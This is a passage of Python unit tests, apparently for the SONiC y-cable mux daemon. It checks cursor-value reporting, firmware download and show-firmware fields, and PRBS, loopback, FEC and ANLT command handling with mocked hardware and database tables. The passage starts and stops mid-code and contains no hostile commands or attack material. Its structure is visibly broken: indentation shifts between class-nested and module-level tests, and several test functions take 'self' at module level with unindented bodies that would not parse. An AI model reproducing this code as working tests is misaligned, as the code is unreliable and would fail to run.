                    self.TARGET_NIC = 0
                    self.TARGET_TOR_A = 1
                    self.TARGET_TOR_B = 2
                    self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                    self.download_firmware_status = 1
                    self.SWITCH_COUNT_MANUAL = "manual"
                    self.SWITCH_COUNT_AUTO = "auto"
                # Distinct cursor vectors per target so the assertions below
                # can tell NIC / TOR-A / TOR-B data apart.
                def get_target_cursor_values(self, i, tgt):
                    if (tgt == self.TARGET_NIC):
                        return ([1, 7, 7, 1, 0])
                    elif (tgt == self.TARGET_TOR_A):
                        return ([17, 17, 17, 17, 17])
                    elif (tgt == self.TARGET_TOR_B):
                        return ([-17, -17, -17, -17, -17])
            patched_util.get.return_value = PortInstanceHelper()
            with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
                patched_util.get_asic_id_for_logical_port.return_value = 0
                rc = get_muxcable_static_info(physical_port, logical_port_name)
            assert (rc['read_side'] == 'tor1')
            assert (rc['nic_lane1_precursor1'] == 1)
            assert (rc['nic_lane1_precursor2'] == 7)
            assert (rc['nic_lane1_maincursor'] == 7)
            assert (rc['nic_lane1_postcursor1'] == 1)
            assert (rc['nic_lane1_postcursor2'] == 0)
            assert (rc['nic_lane2_precursor1'] == 1)
            assert (rc['nic_lane2_precursor2'] == 7)
            assert (rc['nic_lane2_maincursor'] == 7)
            assert (rc['nic_lane2_postcursor1'] == 1)
            assert (rc['nic_lane2_postcursor2'] == 0)
            assert (rc['tor_self_lane1_precursor1'] == 17)
            assert (rc['tor_self_lane1_precursor2'] == 17)
            assert (rc['tor_self_lane1_maincursor'] == 17)
            assert (rc['tor_self_lane1_postcursor1'] == 17)
            assert (rc['tor_self_lane1_postcursor2'] == 17)
            assert (rc['tor_self_lane2_precursor1'] == 17)
            assert (rc['tor_self_lane2_precursor2'] == 17)
            assert (rc['tor_self_lane2_maincursor'] == 17)
            assert (rc['tor_self_lane2_postcursor1'] == 17)
            assert (rc['tor_self_lane2_postcursor2'] == 17)
            assert (rc['tor_peer_lane1_precursor1'] == -17)
            assert (rc['tor_peer_lane1_precursor2'] == -17)
            assert (rc['tor_peer_lane1_maincursor'] == -17)
            assert (rc['tor_peer_lane1_postcursor1'] == -17)
            assert (rc['tor_peer_lane1_postcursor2'] == -17)
            assert (rc['tor_peer_lane2_precursor1'] == -17)
            assert (rc['tor_peer_lane2_precursor2'] == -17)
            assert (rc['tor_peer_lane2_maincursor'] == -17)
            assert (rc['tor_peer_lane2_postcursor1'] == -17)
            assert (rc['tor_peer_lane2_postcursor2'] == -17)
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
    def test_get_muxcable_static_info_read_side_peer(self, platform_sfputil):
        """get_muxcable_static_info on read_side "2": read_side should report
        'tor2' and both tor_self/tor_peer lane fields should carry the
        TOR cursor vectors from the stub driver."""
        physical_port = 0
        logical_port_name = "Ethernet0"
        #swsscommon.Table = MagicMock()
        # this patch is already done as global instance
        platform_sfputil.get_asic_id_for_logical_port = 0
        swsscommon.Table.return_value.get.return_value = (
            True, {"read_side": "2"})
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            class PortInstanceHelper():
                def __init__(self):
                    self.EEPROM_ERROR = -1
                    self.TARGET_NIC = 0
                    self.TARGET_TOR_A = 1
                    self.TARGET_TOR_B = 2
                    self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                    self.download_firmware_status = 1
                    self.SWITCH_COUNT_MANUAL = "manual"
                    self.SWITCH_COUNT_AUTO = "auto"
                # TOR-A and TOR-B return the same vector here, so side
                # selection cannot be distinguished — only the NIC values
                # differ.
                def get_target_cursor_values(self, i, tgt):
                    if (tgt == self.TARGET_NIC):
                        return ([1, 7, 7, 1, 0])
                    elif (tgt == self.TARGET_TOR_A):
                        return ([-17, -17, -17, -17, -17])
                    elif (tgt == self.TARGET_TOR_B):
                        return ([-17, -17, -17, -17, -17])
            patched_util.get.return_value = PortInstanceHelper()
            with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
                patched_util.get_asic_id_for_logical_port.return_value = 0
                rc = get_muxcable_static_info(physical_port, logical_port_name)
            assert (rc['read_side'] == 'tor2')
            assert (rc['nic_lane1_precursor1'] == 1)
            assert (rc['nic_lane1_precursor2'] == 7)
            assert (rc['nic_lane1_maincursor'] == 7)
            assert (rc['nic_lane1_postcursor1'] == 1)
            assert (rc['nic_lane1_postcursor2'] == 0)
            assert (rc['nic_lane2_precursor1'] == 1)
            assert (rc['nic_lane2_precursor2'] == 7)
            assert (rc['nic_lane2_maincursor'] == 7)
            assert (rc['nic_lane2_postcursor1'] == 1)
            assert (rc['nic_lane2_postcursor2'] == 0)
            assert (rc['tor_self_lane1_precursor1'] == -17)
            assert (rc['tor_self_lane1_precursor2'] == -17)
            assert (rc['tor_self_lane1_maincursor'] == -17)
            assert (rc['tor_self_lane1_postcursor1'] == -17)
            assert (rc['tor_self_lane1_postcursor2'] == -17)
            assert (rc['tor_self_lane2_precursor1'] == -17)
            assert (rc['tor_self_lane2_precursor2'] == -17)
            assert (rc['tor_self_lane2_maincursor'] == -17)
            assert (rc['tor_self_lane2_postcursor1'] == -17)
            assert (rc['tor_self_lane2_postcursor2'] == -17)
            assert (rc['tor_peer_lane1_precursor1'] == -17)
            assert (rc['tor_peer_lane1_precursor2'] == -17)
            assert (rc['tor_peer_lane1_maincursor'] == -17)
            assert (rc['tor_peer_lane1_postcursor1'] == -17)
            assert (rc['tor_peer_lane1_postcursor2'] == -17)
            assert (rc['tor_peer_lane2_precursor1'] == -17)
            assert (rc['tor_peer_lane2_precursor2'] == -17)
            assert (rc['tor_peer_lane2_maincursor'] == -17)
            assert (rc['tor_peer_lane2_postcursor1'] == -17)
            assert (rc['tor_peer_lane2_postcursor2'] == -17)
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
    def test_get_muxcable_static_info_read_side_peer_exceptions(self, platform_sfputil):
        """get_muxcable_static_info when get_target_cursor_values raises
        NotImplementedError: read_side still resolves ('tor2') but cursor
        fields fall back to "N/A"."""
        physical_port = 0
        logical_port_name = "Ethernet0"
        #swsscommon.Table = MagicMock()
        # this patch is already done as global instance
        platform_sfputil.get_asic_id_for_logical_port = 0
        swsscommon.Table.return_value.get.return_value = (
            True, {"read_side": "2"})
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            class PortInstanceHelper():
                def __init__(self):
                    self.EEPROM_ERROR = -1
                    self.TARGET_NIC = 0
                    self.TARGET_TOR_A = 1
                    self.TARGET_TOR_B = 2
                    self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                    self.download_firmware_status = 1
                    self.SWITCH_COUNT_MANUAL = "manual"
                    self.SWITCH_COUNT_AUTO = "auto"
                # Cursor reads are unavailable on this stub.
                def get_target_cursor_values(self, i, tgt):
                    raise NotImplementedError
            patched_util.get.return_value = PortInstanceHelper()
            with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
                patched_util.get_asic_id_for_logical_port.return_value = 0
                rc = get_muxcable_static_info(physical_port, logical_port_name)
            assert (rc['read_side'] == 'tor2')
            assert (rc['nic_lane1_precursor1'] == "N/A")
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
def test_task_download_firmware_worker(self, port_instance, mock_swsscommon_table):
port = "Ethernet0"
physical_port = 0
file_full_path = "/path/to/file"
def mock_download_fw(filepath):
return 0
port_instance.download_firmware = mock_download_fw
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
rc = {}
task_download_firmware_worker(port, physical_port, port_instance, file_full_path,
xcvrd_down_fw_rsp_tbl, xcvrd_down_fw_cmd_sts_tbl, rc)
assert(rc[0] == 0)
def test_set_show_firmware_fields(self):
mux_info_dict = {}
xcvrd_show_fw_res_tbl = Table("STATE_DB", "XCVRD_SHOW_FW_RES")
mux_info_dict['version_self_active'] = '0.8'
mux_info_dict['version_self_inactive'] = '0.7'
mux_info_dict['version_self_next'] = '0.7'
mux_info_dict['version_peer_active'] = '0.8'
mux_info_dict['version_peer_inactive'] = '0.7'
mux_info_dict['version_peer_next'] = '0.7'
mux_info_dict['version_nic_active'] = '0.8'
mux_info_dict['version_nic_inactive'] = '0.7'
mux_info_dict['version_nic_next'] = '0.7'
rc = set_show_firmware_fields(
"Ethernet0", mux_info_dict, xcvrd_show_fw_res_tbl)
assert(rc == 0)
@patch('sonic_py_common.device_info.get_paths_to_platform_and_hwsku_dirs', MagicMock(return_value=('/tmp', None)))
@patch('swsscommon.swsscommon.WarmStart', MagicMock())
@patch('ycable.ycable.platform_sfputil', MagicMock())
@patch('ycable.ycable.DaemonYcable.load_platform_util', MagicMock())
def test_DaemonYcable_init_deinit(self):
ycable = DaemonYcable(SYSLOG_IDENTIFIER)
ycable.init()
ycable.deinit()
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "enable", {"mode_value": "0",
"lane_mask": "0",
"direction": "0"})))
def test_handle_config_prbs_cmd_arg_tbl_notification_no_port(self, port_instance, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
asic_index = 0
port = "Ethernet0"
fvp = {"config_prbs": True}
rc = handle_config_prbs_cmd_arg_tbl_notification(
fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "enable", {"mode_value": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
def test_handle_config_prbs_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
asic_index = 0
port = "Ethernet0"
fvp = {"config_prbs": True}
rc = handle_config_prbs_cmd_arg_tbl_notification(
fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
assert(rc == -1)
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
    @patch('swsscommon.swsscommon.Table')
    @patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
    @patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "enable", {"mode_value": "0",
                                                                                                                                "lane_mask": "0",
                                                                                                                                "direction": "0"})))
    @patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
    def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_enable(self, port_instance, mock_swsscommon_table, port_instance_helper):
        """An 'enable' PRBS request with a resolvable port instance should be
        handled without error (returns None).

        NOTE(review): mock.patch injects bottom-up, so `port_instance` here
        receives the get_ycable_port_instance_from_logical_port mock and
        `port_instance_helper` the y_cable_port_instances mock; the local
        reassignments below rebind names only and do not configure the
        patched get_ycable_port_instance_from_logical_port return value —
        confirm this is intended.
        """
        mock_table = MagicMock()
        mock_swsscommon_table.return_value = mock_table
        xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
        xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
        xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
        # Locally configured mock; rebinding does not alter the patches above.
        port_instance = MagicMock()
        port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
        port_instance.PRBS_DIRECTION_BOTH = 2
        port_instance.enable_prbs_mode.return_value = True
        port_instance.disable_prbs_mode.return_value = True
        port_instance_helper = port_instance
        asic_index = 0
        port = "Ethernet0"
        fvp = {"config_prbs": True}
        rc = handle_config_prbs_cmd_arg_tbl_notification(
            fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
        assert(rc == None)
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
    @patch('swsscommon.swsscommon.Table')
    @patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
    @patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "disable", {"mode_value": "0",
                                                                                                                                 "lane_mask": "0",
                                                                                                                                 "direction": "0"})))
    @patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
    def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_disable(self, port_instance, mock_swsscommon_table, port_instance_helper):
        """A 'disable' PRBS request with a resolvable port instance should be
        handled without error (returns None).

        NOTE(review): mock.patch injects bottom-up, so `port_instance` here
        receives the get_ycable_port_instance_from_logical_port mock and
        `port_instance_helper` the y_cable_port_instances mock; the local
        reassignments below rebind names only and do not configure the
        patched get_ycable_port_instance_from_logical_port return value —
        confirm this is intended.
        """
        mock_table = MagicMock()
        mock_swsscommon_table.return_value = mock_table
        xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
        xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
        xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
        # Locally configured mock; rebinding does not alter the patches above.
        port_instance = MagicMock()
        port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
        port_instance.PRBS_DIRECTION_BOTH = 2
        port_instance.enable_prbs_mode.return_value = True
        port_instance.disable_prbs_mode.return_value = True
        port_instance_helper = port_instance
        asic_index = 0
        port = "Ethernet0"
        fvp = {"config_prbs": True}
        rc = handle_config_prbs_cmd_arg_tbl_notification(
            fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
        assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "reset",
                               {"mode_value": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_reset(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """PRBS 'reset' sub-command with a well-formed arg payload completes and returns None."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    cmd_arg_tbl = cmd_sts_tbl = rsp_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.configure_mock(
        FIRMWARE_DOWNLOAD_STATUS_INPROGRESS=1,
        PRBS_DIRECTION_BOTH=2,
        **{"enable_prbs_mode.return_value": True,
           "disable_prbs_mode.return_value": True,
           "reset.return_value": True})
    port_instance_helper = port_instance
    rc = handle_config_prbs_cmd_arg_tbl_notification(
        {"config_prbs": True}, cmd_arg_tbl, cmd_sts_tbl, rsp_tbl, 0, "Ethernet0")
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "anlt",
                               {"mode": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_anlt_enable(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """'anlt' sub-command whose payload carries the expected 'mode' key returns None."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    cmd_arg_tbl = cmd_sts_tbl = rsp_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.configure_mock(
        FIRMWARE_DOWNLOAD_STATUS_INPROGRESS=1,
        PRBS_DIRECTION_BOTH=2,
        **{"enable_prbs_mode.return_value": True,
           "disable_prbs_mode.return_value": True,
           "reset.return_value": True,
           "set_anlt.return_value": True})
    port_instance_helper = port_instance
    rc = handle_config_prbs_cmd_arg_tbl_notification(
        {"config_prbs": True}, cmd_arg_tbl, cmd_sts_tbl, rsp_tbl, 0, "Ethernet0")
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "anlt",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_anlt_disable(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """'anlt' sub-command with a malformed payload ('modex' instead of 'mode') returns -1."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    cmd_arg_tbl = cmd_sts_tbl = rsp_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.configure_mock(
        FIRMWARE_DOWNLOAD_STATUS_INPROGRESS=1,
        PRBS_DIRECTION_BOTH=2,
        **{"enable_prbs_mode.return_value": True,
           "disable_prbs_mode.return_value": True,
           "reset.return_value": True,
           "set_anlt.return_value": True})
    port_instance_helper = port_instance
    rc = handle_config_prbs_cmd_arg_tbl_notification(
        {"config_prbs": True}, cmd_arg_tbl, cmd_sts_tbl, rsp_tbl, 0, "Ethernet0")
    assert rc == -1
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"mode": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_fec_enable(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """'fec' sub-command whose payload carries the expected 'mode' key returns None."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    cmd_arg_tbl = cmd_sts_tbl = rsp_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.configure_mock(
        FIRMWARE_DOWNLOAD_STATUS_INPROGRESS=1,
        PRBS_DIRECTION_BOTH=2,
        **{"enable_prbs_mode.return_value": True,
           "disable_prbs_mode.return_value": True,
           "reset.return_value": True,
           "set_fec_mode.return_value": True})
    port_instance_helper = port_instance
    rc = handle_config_prbs_cmd_arg_tbl_notification(
        {"config_prbs": True}, cmd_arg_tbl, cmd_sts_tbl, rsp_tbl, 0, "Ethernet0")
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_fec_disable(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """'fec' sub-command with a malformed payload ('modex' instead of 'mode') returns -1."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    cmd_arg_tbl = cmd_sts_tbl = rsp_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.configure_mock(
        FIRMWARE_DOWNLOAD_STATUS_INPROGRESS=1,
        PRBS_DIRECTION_BOTH=2,
        **{"enable_prbs_mode.return_value": True,
           "disable_prbs_mode.return_value": True,
           "reset.return_value": True,
           "set_fec_mode.return_value": True})
    port_instance_helper = port_instance
    rc = handle_config_prbs_cmd_arg_tbl_notification(
        {"config_prbs": True}, cmd_arg_tbl, cmd_sts_tbl, rsp_tbl, 0, "Ethernet0")
    assert rc == -1
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_else_value(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """An fvp without the 'config_prbs' key takes the else branch and returns None."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    cmd_arg_tbl = cmd_sts_tbl = rsp_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.configure_mock(
        FIRMWARE_DOWNLOAD_STATUS_INPROGRESS=1,
        PRBS_DIRECTION_BOTH=2,
        **{"enable_prbs_mode.return_value": True,
           "disable_prbs_mode.return_value": True,
           "reset.return_value": True,
           "set_fec_mode.return_value": True})
    port_instance_helper = port_instance
    rc = handle_config_prbs_cmd_arg_tbl_notification(
        {"config_abc": True}, cmd_arg_tbl, cmd_sts_tbl, rsp_tbl, 0, "Ethernet0")
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_loop_cmd_arg_tbl_notification_else_value(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """An fvp without the 'config_loop' key takes the else branch and returns None."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    loop_arg_tbl = loop_sts_tbl = loop_rsp_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.configure_mock(
        FIRMWARE_DOWNLOAD_STATUS_INPROGRESS=1,
        PRBS_DIRECTION_BOTH=2,
        **{"enable_prbs_mode.return_value": True,
           "disable_prbs_mode.return_value": True,
           "reset.return_value": True,
           "set_fec_mode.return_value": True})
    port_instance_helper = port_instance
    rc = handle_config_loop_cmd_arg_tbl_notification(
        {"config_abc": True}, loop_arg_tbl, loop_sts_tbl, loop_rsp_tbl, 0, "Ethernet0")
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_loop_cmd_arg_tbl_notification_with_config_loop(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """'config_loop' notification with an unrecognized arg payload returns None.

    Renamed from test_handle_config_loop_cmd_arg_tbl_notification_else_value:
    that name duplicated the test defined just above, so this later definition
    shadowed it and the genuine else-branch test was never collected or run.
    The new name also reflects what this case actually covers — the fvp DOES
    contain the "config_loop" key (unlike the else-branch case).
    """
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    # All three DB table handles share the same mocked swsscommon Table.
    xcvrd_config_loop_cmd_arg_tbl = mock_swsscommon_table
    xcvrd_config_loop_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_config_loop_rsp_tbl = mock_swsscommon_table
    # NOTE(review): rebinds the injected fixtures locally; the handler sees the
    # module-level patched objects, not these locals.
    port_instance = MagicMock()
    port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
    port_instance.PRBS_DIRECTION_BOTH = 2
    port_instance.enable_prbs_mode.return_value = True
    port_instance.disable_prbs_mode.return_value = True
    port_instance.reset.return_value = True
    port_instance.set_fec_mode.return_value = True
    port_instance_helper = port_instance
    asic_index = 0
    port = "Ethernet0"
    fvp = {"config_loop": True}
    rc = handle_config_loop_cmd_arg_tbl_notification(
        fvp, xcvrd_config_loop_cmd_arg_tbl, xcvrd_config_loop_cmd_sts_tbl, xcvrd_config_loop_rsp_tbl, asic_index, port)
    assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
def test_handle_config_loop_cmd_arg_tbl_notification_no_port(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """Without the physical-port lookup patched, the handler fails with -1."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    loop_arg_tbl = loop_sts_tbl = loop_rsp_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.configure_mock(
        FIRMWARE_DOWNLOAD_STATUS_INPROGRESS=1,
        PRBS_DIRECTION_BOTH=2,
        **{"enable_prbs_mode.return_value": True,
           "disable_prbs_mode.return_value": True,
           "reset.return_value": True,
           "set_fec_mode.return_value": True})
    port_instance_helper = port_instance
    rc = handle_config_loop_cmd_arg_tbl_notification(
        {"config_loop": True}, loop_arg_tbl, loop_sts_tbl, loop_rsp_tbl, 0, "Ethernet0")
    assert rc == -1
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_loop_cmd_arg_tbl_notification_no_instance(self, port_instance, mock_swsscommon_table):
    """Without the port-instance lookup patched, the handler fails with -1."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    loop_arg_tbl = loop_sts_tbl = loop_rsp_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.configure_mock(
        FIRMWARE_DOWNLOAD_STATUS_INPROGRESS=1,
        PRBS_DIRECTION_BOTH=2,
        **{"enable_prbs_mode.return_value": True,
           "disable_prbs_mode.return_value": True,
           "reset.return_value": True,
